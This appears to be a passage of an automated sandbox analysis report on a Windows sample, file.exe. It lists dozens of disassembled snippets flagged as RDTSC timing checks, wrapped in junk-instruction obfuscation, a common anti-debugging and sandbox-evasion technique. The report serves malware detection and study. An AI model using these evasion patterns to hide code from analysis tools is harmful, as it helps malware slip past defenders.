              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF874D second address: CF8791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FA1D8D64E58h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FA1D8D64E75h 0x00000019 jo 00007FA1D8D64E6Fh 0x0000001f jmp 00007FA1D8D64E63h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE6EF second address: CEE6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB290 second address: CFB2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA1D8D64E56h 0x0000000c popad 0x0000000d pushad 0x0000000e js 00007FA1D8D64E56h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FA1D8D64E67h 0x0000001b popad 0x0000001c jmp 00007FA1D8D64E5Fh 0x00000021 pushad 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA526B second address: CA5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE6F3 second address: CEE70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE7B3 second address: CEE7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0288D second address: D02893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02893 second address: D028EC instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1D8D1834Fh 0x00000008 jmp 00007FA1D8D18349h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jnp 00007FA1D8D18336h 0x00000016 jc 00007FA1D8D18336h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f jbe 00007FA1D8D1835Bh 0x00000025 pushad 0x00000026 jp 00007FA1D8D18336h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f pushad 0x00000030 jmp 00007FA1D8D18341h 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02200 second address: D02206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02206 second address: D02221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1D8D1833Ch 0x0000000c jc 00007FA1D8D18336h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF08C5 second address: CF0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FA1D8D64E60h 0x00000010 nop 0x00000011 jmp 00007FA1D8D64E5Fh 0x00000016 mov dword ptr [ebp+122D299Dh], ecx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov di, 2ABFh 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FA1D8D64E58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D03D9h] 0x0000004e sub ebx, dword ptr [ebp+122D3545h] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007FA1D8D64E58h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000019h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 mov edi, 2E042434h 0x00000075 sub dword ptr [ebp+122D1927h], esi 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jno 00007FA1D8D64E58h 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4867 second address: CF486C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6996 second address: CF699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8F12 second address: CF8F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8F18 second address: CF8F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D067C1 second address: D067DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18341h 0x00000009 jo 00007FA1D8D18336h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D067DC second address: D067E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D067E0 second address: D067F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA1D8D18336h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07F02 second address: D07F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA1D8D64E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08056 second address: D0805B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0805B second address: D080A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D64E56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jg 00007FA1D8D64E5Ch 0x00000015 jmp 00007FA1D8D64E5Eh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007FA1D8D64E5Dh 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jnc 00007FA1D8D64E56h 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D080A7 second address: D080AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D080AB second address: D080BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D080BC second address: D080C6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F133 second address: D0F141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DE30 second address: D0DE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DE34 second address: D0DE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E4E8 second address: D0E4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18341h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E4FF second address: D0E503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E7C4 second address: D0E7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18345h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E9A0 second address: D0E9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E9A4 second address: D0E9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EC80 second address: D0ECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E69h 0x00000009 jl 00007FA1D8D64E56h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECA8 second address: D0ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EE36 second address: D0EE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA1D8D64E56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EE45 second address: D0EE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EE49 second address: D0EE5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EFB1 second address: D0EFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13772 second address: D13778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13778 second address: D1377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1377D second address: D137B2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1D8D64E6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1D8D64E5Dh 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE503F second address: CE5048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5048 second address: CE504C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE57D9 second address: CE57DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE57DE second address: CE5809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jno 00007FA1D8D64E5Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push ebx 0x00000014 jng 00007FA1D8D64E56h 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007FA1D8D64E56h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5809 second address: CE580D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE59F0 second address: CE5A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FA1D8D64E56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5A11 second address: CE5A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5DD8 second address: CE5E60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1D8D64E58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA1D8D64E58h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov edx, 3B7F6141h 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FA1D8D64E58h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D278Ch], esi 0x00000050 ja 00007FA1D8D64E58h 0x00000056 nop 0x00000057 jl 00007FA1D8D64E6Bh 0x0000005d jmp 00007FA1D8D64E65h 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE61E8 second address: CE61F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE61F5 second address: CC358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA1D8D64E62h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA1D8D64E58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov edx, dword ptr [ebp+122D3529h] 0x0000002c lea eax, dword ptr [ebp+12488E38h] 0x00000032 mov dword ptr [ebp+122D2768h], esi 0x00000038 push eax 0x00000039 jmp 00007FA1D8D64E5Ch 0x0000003e mov dword ptr [esp], eax 0x00000041 or cx, 424Ah 0x00000046 lea eax, dword ptr [ebp+12488DF4h] 0x0000004c mov ecx, edi 0x0000004e nop 0x0000004f pushad 0x00000050 jmp 00007FA1D8D64E5Bh 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 jmp 00007FA1D8D64E61h 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 jmp 00007FA1D8D64E61h 0x00000065 nop 0x00000066 mov edx, 47E66B7Fh 0x0000006b call dword ptr [ebp+122D1B75h] 0x00000071 pushad 0x00000072 jmp 00007FA1D8D64E65h 0x00000077 jnl 00007FA1D8D64E6Dh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC358B second address: CC35E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18341h 0x00000009 jmp 00007FA1D8D18349h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1D8D18346h 0x00000016 jne 00007FA1D8D18345h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC35E7 second address: CC35ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC35ED second address: CC35F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC35F1 second address: CC35F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B78 second address: D12B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B7C second address: D12B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12E6E second address: D12EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D1833Fh 0x00000008 jno 00007FA1D8D18336h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jnl 00007FA1D8D18336h 0x00000016 popad 0x00000017 jmp 00007FA1D8D18348h 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FA1D8D18344h 0x00000026 push esi 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12EC3 second address: D12ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12ECB second address: D12ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13177 second address: D13189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13189 second address: D1319C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1D8D18336h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D132E8 second address: D132EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D132EE second address: D132F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19165 second address: D19169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D19169 second address: D19187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jp 00007FA1D8D18336h 0x00000011 jbe 00007FA1D8D18336h 0x00000017 jnl 00007FA1D8D18336h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92A0D second address: C92A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FA1D8D64E56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17DE1 second address: D17DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17F60 second address: D17F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1835D second address: D18388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FA1D8D1833Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FA1D8D18343h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18388 second address: D1838C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18490 second address: D1849E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D18336h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1849E second address: D184C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA1D8D64E5Dh 0x0000000b jmp 00007FA1D8D64E5Fh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D184C1 second address: D184D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D1833Ah 0x00000009 jl 00007FA1D8D18336h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D184D5 second address: D184D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17B2C second address: D17B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17B30 second address: D17B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17B34 second address: D17B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D188E6 second address: D1891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E65h 0x00000009 jmp 00007FA1D8D64E68h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1891B second address: D18946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18347h 0x00000009 jmp 00007FA1D8D1833Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DC3 second address: D18DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DCE second address: D18DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DD2 second address: D18DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DDD second address: D18DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DE3 second address: D18DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18DE7 second address: D18E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18342h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1D8D18349h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18E1A second address: D18E30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FA1D8D64E56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
